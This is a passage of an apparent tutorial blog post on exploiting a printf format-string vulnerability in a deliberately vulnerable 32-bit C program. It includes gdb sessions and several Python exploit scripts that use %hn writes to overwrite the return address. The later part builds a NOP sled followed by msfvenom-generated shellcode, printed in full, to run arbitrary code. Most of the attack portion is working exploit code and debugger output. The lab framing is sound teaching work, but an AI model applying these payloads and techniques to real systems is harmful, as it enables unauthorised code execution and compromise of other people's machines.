AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x56556244 in vulnerable ()
(gdb) x/a 0xffffd13c
0xffffd13c:	0x56556264 <main+31>
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[Inferior 1 (process 7959) exited normally]
(gdb) 

We failed. There was no crash and the return address was never touched. Why!? Does that make sense!? The answer is very simple: the program accepts only 8192 bytes of input, but our payload is much larger. We now badly need to shrink the injected payload without losing its effectiveness, but how can that be done? When I introduced the %n feature I told you “that specifier requires an int pointer and writes in that variable how many characters have been processed by the function”, so now we have to trick the printf function into processing a large amount of data without actually passing that data through stdin. The printf function has a nice feature that lets developers pad their data with spaces without actually writing them, just by specifying the number of required spaces before the conversion character, as in %10s. We can abuse this feature to reduce our payload size and get the same result without exceeding the limit. Let’s modify our exploit:
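To put numbers on that, here is a small sketch comparing the two payload shapes for the first write only. `literal_size` and `padded_size` are hypothetical helpers, and the sizes simply count the bytes each payload would contain.

```python
def literal_size(address_bytes, value, suffix):
    """Payload length when the filler characters are supplied literally."""
    filler = value - address_bytes
    return address_bytes + filler + len(suffix)


def padded_size(address_bytes, value, suffix):
    """Payload length when a field width such as %25029p does the printing."""
    width_spec = f"%{value - address_bytes}p"
    return address_bytes + len(width_spec) + len(suffix)


LIMIT = 8192  # size of the buffer passed to fgets in the vulnerable program
literal = literal_size(8, 0x61CD, "%4$hn")
padded = padded_size(8, 0x61CD, "%4$hn")
print(literal, literal < LIMIT)
print(padded, padded < LIMIT)
```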

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0x61cd - len(payload)) ).encode() + b"p" # => %25029p
payload += b"%4$hn" # pass the low order address as a parameter to printf
payload += b"%" + str( (0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s run it under gdb and see whether this strategy works.

We successfully overwrote the low-order bytes with the expected value, but the high-order bytes are not right. The reason is that the second write stores the total number of characters processed so far, which already includes everything printed for the low-order write. Moreover, the high-order half of the address is smaller than the low-order half. There are two solutions to this problem. The first is to rearrange the writing priorities: write the high-order value first and then the low-order value. The second is to make the function process more characters until the 2-byte counter overflows and wraps around to zero, and then count up again from there. The second method is not difficult, as the arithmetic is easy, but I think the first method is easier and more effective. Let us modify the exploit code and rearrange the writing priorities.
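Both options can be sketched in a few lines, under stated assumptions. `hn_paddings` and `wrap_padding` are hypothetical helpers, and the counts assume the two 4-byte addresses at the start of the payload are the only characters printed before the first padding.

```python
def hn_paddings(values, already_printed):
    """Plan %hn writes in ascending order of value.

    `values` maps a positional index to the 16-bit value wanted there.
    Returns (index, padding) pairs, where padding is the number of extra
    characters to print before that write.
    """
    plan = []
    count = already_printed
    for index, value in sorted(values.items(), key=lambda item: item[1]):
        plan.append((index, value - count))
        count = value
    return plan


def wrap_padding(wanted, count):
    """Padding that brings the 16-bit view of the counter to `wanted`,
    wrapping past 0xFFFF if needed."""
    return (wanted - count) % 0x10000


print(hn_paddings({4: 0x61CD, 5: 0x5655}, 8))
print(wrap_padding(0x5655, 0x61CD))
```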

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf
payload += b"%" + str( (0x61cd - 0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%4$hn" # pass the low order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)
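
Before running it, the counter can also be traced offline. The sketch below is a hypothetical helper (trace_counts is not part of the original exploit) that walks the format string and reports what each %hn would store. It assumes that every %Np emits exactly N characters and that every other byte is printed as one character, so it is only an approximation of what printf does, not a substitute for gdb.

```python
import re

def trace_counts(fmt: bytes) -> dict:
    """Return {argument index: 16-bit value} for every %k$hn in fmt."""
    written = {}
    count = 0      # characters printf has emitted so far
    pos = 0        # end of the previous directive
    token = re.compile(rb"%(\d+)p|%(\d+)\$hn")
    for m in token.finditer(fmt):
        count += m.start() - pos           # literal bytes before the directive
        if m.group(1) is not None:         # %Np: padded pointer
            count += int(m.group(1))
        else:                              # %k$hn: store the low 16 bits
            written[int(m.group(2))] = count & 0xffff
        pos = m.end()
    return written

# Same construction as the exploit above.
payload  = b""
payload += b"\x3c\xd1\xff\xff"
payload += b"\x3e\xd1\xff\xff"
payload += b"%" + str(0x5655 - len(payload)).encode() + b"p"
payload += b"%5$hn"
payload += b"%" + str(0x61cd - 0x5655 - len(payload)).encode() + b"p"
payload += b"%4$hn"

result = trace_counts(payload)
print({index: hex(value) for index, value in result.items()})
# {5: '0x5655', 4: '0x61b9'}
```

Under these assumptions the high-order half comes out as intended, while the low-order half ends up slightly below 0x61cd.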

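Our plan worked and we got close to the value we wanted; we only need to add 0x14 to the current value. The gap is not random: when the second width is computed, len(payload) is exactly 0x14 (8 address bytes, 7 bytes for %22093p and 5 bytes for %5$hn), and subtracting it is unnecessary because the counter already stands at 0x5655.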

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf
payload += b"%" + str( (0x61cd - 0x5655 - len(payload)) + 0x14 ).encode() + b"p" 
payload += b"%4$hn" # pass the low order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s try it.

BINGO! We finally overwrote the instruction pointer and redirected the execution flow to call the pwnme function.
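
The manual steps above (ordering the writes and correcting the widths) can be folded into one small routine. The following is a minimal sketch, not the author’s method: build_hn_payload is a hypothetical helper, and it assumes that the two addresses at the start of the buffer are reachable as printf arguments first_index and first_index + 1 (4 and 5 in this article) and that none of the generated bytes is a null byte or a newline. It tracks printf’s counter directly instead of using len(payload), which is what made the 0x14 correction necessary.

```python
import struct

def build_hn_payload(where: int, what: int, first_index: int) -> bytes:
    """Write the 32-bit `what` to address `where` as two %hn halves."""
    low, high = what & 0xffff, what >> 16
    payload  = struct.pack("<I", where)       # argument first_index     -> low half
    payload += struct.pack("<I", where + 2)   # argument first_index + 1 -> high half

    count = len(payload)                      # characters emitted so far
    # Write the smaller half first so the counter only has to grow.
    for value, index in sorted([(low, first_index), (high, first_index + 1)]):
        pad = (value - count) % 0x10000       # wraps if the counter is past value
        if 0 < pad < 16:
            pad += 0x10000                    # a tiny width is ignored: %p prints more
        if pad:
            payload += b"%" + str(pad).encode() + b"p"
        payload += b"%" + str(index).encode() + b"$hn"
        count += pad
    return payload

payload = build_hn_payload(0xffffd13c, 0x565561cd, 4)
print(payload)
```

For the values used in this article the helper produces the same directives as the final exploit, %22093p%5$hn followed by %2936p%4$hn. Sorting covers the “rearrange the writes” solution, and the modulo covers the wrap-around one.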

Executing arbitrary code

Since we can manipulate and redirect the program’s execution flow, we can also inject our own code and force the program to execute it. Let’s remove the pwnme function from the vulnerable sample:

#include <stdio.h>

void vulnerable()
{
    char cStrFmt[8192];
    fgets( cStrFmt, sizeof(cStrFmt), stdin );
    printf( cStrFmt );
}

void main()
{
    vulnerable();
}

And recompile that code as follows:

┌──(abdallah㉿pc)-[~]
└─$ gcc -m32 -pie -z execstack test.c -o test

┌──(abdallah㉿pc)-[~]
└─$ echo "Hello World!" | ./test
Hello World!

Our plan is to inject our malicious code into the stack and then forge the return address so that it points to that code and the CPU executes it. We have already learned how to overwrite anything in memory, so I will go through this quickly.

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b vulnerable 
Breakpoint 1 at 0x11b1
(gdb) r < exploit.txt
Starting program: /home/abdallah/test < exploit.txt

Breakpoint 1, 0x565561b1 in vulnerable ()
(gdb) p $ebp+4
$1 = (void *) 0xffffd14c
(gdb) p $ebp-8192
$2 = (void *) 0xffffb148

The function’s return address lives at 0xffffd14c, and we will inject our shellcode around 0xffffb148. I don’t care about exact offsets because I will pad my shellcode with many NOP instructions; all we need to do is make sure that we are still inside the function’s stack frame. That’s why I aim at $ebp-8192: the frame contains the 8192-byte format buffer, so it must be at least that large. Let’s prepare our exploit:

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd14c <== target (return address pointer)
# 0xffffb148 <== shellcode address

payload  = b""
payload += b"\x4c\xd1\xff\xff" # where the return address is stored, little endian (low-order half)
payload += b"\x4e\xd1\xff\xff" # the same location + 2 (high-order half)
# First write: pad until the counter reaches 0xb148 + 0x100 = 0xb248
payload += b"%" + str( (0xb148 - len(payload)) + 0x100 ).encode() + b"p" 
payload += b"%4$hn" # store 0xb248 in the low-order half
# Second write: the counter must reach 0xffff. len(payload) is 0x14 here
# and 0x14 + 0xec = 0x100, so the width below equals 0xffff - 0xb248
payload += b"%" + str( (0xffff - 0xb148 - len(payload)) - 0xec ).encode() + b"p" 
payload += b"%5$hn" # store 0xffff in the high-order half
payload += b"\x90" * 0x400 # NOP Instructions
payload += b"\xdb\xdd\xd9\x74\x24\xf4\xb8\x0e\x28\x82\x71\x5f\x31"
payload += b"\xc9\xb1\x0c\x31\x47\x18\x03\x47\x18\x83\xef\xf2\xca"
payload += b"\x77\x1b\x01\x53\xe1\x8e\x73\x0b\x3c\x4c\xf2\x2c\x56"
payload += b"\xbd\x77\xdb\xa7\xa9\x58\x79\xc1\x47\x2f\x9e\x43\x70"
payload += b"\x2c\x61\x64\x80\x5b\x05\x64\xd7\xc8\x4c\x85\x1a\x6e"
payload += b"\x7f\x9d\xcf\x6f\xd8\xec\x90"

with open("exploit.txt", "wb+") as f:
    f.write(payload)

The shellcode I use is generated by msfvenom as follows:

┌──(abdallah㉿pc)-[~]
└─$ msfvenom -a x86 --platform linux -p linux/x86/exec -f python -b "\x00" CMD="id" AppendExit=true
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 72 (iteration=0)
x86/shikata_ga_nai chosen with final size 72
Payload size: 72 bytes
Final size of python file: 365 bytes
buf =  b""
buf += b"\xdb\xdd\xd9\x74\x24\xf4\xb8\x0e\x28\x82\x71\x5f\x31"
buf += b"\xc9\xb1\x0c\x31\x47\x18\x03\x47\x18\x83\xef\xf2\xca"
buf += b"\x77\x1b\x01\x53\xe1\x8e\x73\x0b\x3c\x4c\xf2\x2c\x56"
buf += b"\xbd\x77\xdb\xa7\xa9\x58\x79\xc1\x47\x2f\x9e\x43\x70"
buf += b"\x2c\x61\x64\x80\x5b\x05\x64\xd7\xc8\x4c\x85\x1a\x6e"
buf += b"\x7f\x9d\xcf\x6f\xd8\xec\x90"

The exploit places the malicious format string, which hijacks the execution flow, at the head of the payload. Then it sprays the stack with NOP (No Operation) instructions so that we can jump to any address in that range without being restricted to one specific address. This matters because the stack layout may differ between the gdb environment and the real environment for several reasons, such as additional environment variables. You may also notice that gdb runs the program with its full path, which may not be the case in a real scenario. All these considerations call for a stable solution.

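The exploit overwrites the return address with 0xffffb148 + 0x100 = 0xffffb248 so that we land well inside the NOP range even if the layout shifts slightly. When the program jumps to that address, it will find NOP instructions followed by our malicious code. Note that the NOPs only loosen the jump target; the location we write to (0xffffd14c) must still be exact.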

Breakpoint 2, 0x565561f9 in vulnerable ()
(gdb) si
0xffffb248 in ?? ()
(gdb) x/20i 0xffffb248
=> 0xffffb248:	nop
   0xffffb249:	nop
   0xffffb24a:	nop
   0xffffb24b:	nop
   0xffffb24c:	nop
   0xffffb24d:	nop
   0xffffb24e:	nop
   0xffffb24f:	nop
   0xffffb250:	nop
   0xffffb251:	nop
   0xffffb252:	nop
   0xffffb253:	nop
   0xffffb254:	nop
   0xffffb255:	nop
   0xffffb256:	nop
   0xffffb257:	nop
   0xffffb258:	nop
   0xffffb259:	nop
   0xffffb25a:	nop
   0xffffb25b:	nop

The CPU will keep executing those NOPs until it reaches the shellcode; it will then execute the shellcode, which terminates the program.
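
To get a feeling for how much slack the NOPs give us, the sketch below computes how far a landing address sits from both ends of the sled. It is only an illustration under stated assumptions: sled_margins is a hypothetical helper, the sled is assumed to start right after the 32-byte format string at the head of the buffer, and the buffer address 0xffffb13c is a made-up example that must be replaced with the value read from gdb.

```python
def sled_margins(buf_start: int, head_len: int, sled_len: int, landing: int):
    """Return (NOPs before landing, NOPs from landing to the shellcode),
    or None when the landing address is outside the sled."""
    sled_start = buf_start + head_len
    sled_end = sled_start + sled_len          # first byte of the shellcode
    if not sled_start <= landing < sled_end:
        return None
    return landing - sled_start, sled_end - landing

# Format-string head of the exploit above: 2 addresses + 4 directives.
HEAD_LEN = len(b"\x4c\xd1\xff\xff\x4e\xd1\xff\xff%45632p%4$hn%19895p%5$hn")
SLED_LEN = 0x400
LANDING  = 0xffffb148 + 0x100

ASSUMED_BUF = 0xffffb13c    # hypothetical buffer address, not taken from the article

margins = sled_margins(ASSUMED_BUF, HEAD_LEN, SLED_LEN, LANDING)
print(HEAD_LEN, margins)
```

With this assumed buffer address the jump lands a few hundred bytes away from either edge of the sled, which is the tolerance that absorbs small differences in the landing address.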

Conclusion

At the end of the article, I would like to advise you to practice what you have learned with your own hands and not just read. You must face problems and try to solve them yourself, search and ask those who are more experienced than you. In this way, your level will improve and your skills will increase. Do not forget that practice is the key. If you enjoyed the article, do not forget to share it. Thank you for reading. See you later in a new article.